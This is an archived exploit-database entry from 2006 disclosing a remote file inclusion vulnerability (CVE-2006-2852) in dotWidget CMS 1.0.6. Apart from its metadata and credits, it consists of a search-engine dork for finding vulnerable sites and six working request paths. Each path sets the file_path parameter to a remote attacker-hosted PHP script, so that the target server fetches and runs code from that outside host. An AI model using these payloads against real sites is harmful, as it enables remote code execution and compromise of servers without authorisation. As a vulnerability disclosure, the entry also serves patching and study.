dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion

Author: Aesthetico
type: webapps
platform: php
port: 
date_added: 2006-06-04 
date_updated:  
verified: 1 
codes: OSVDB-25983;CVE-2006-2852;OSVDB-25982;OSVDB-25981 
tags: 
aliases:  
screenshot_url:  
application_url: 

Title: dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------

Exploitation:

/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues.

/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]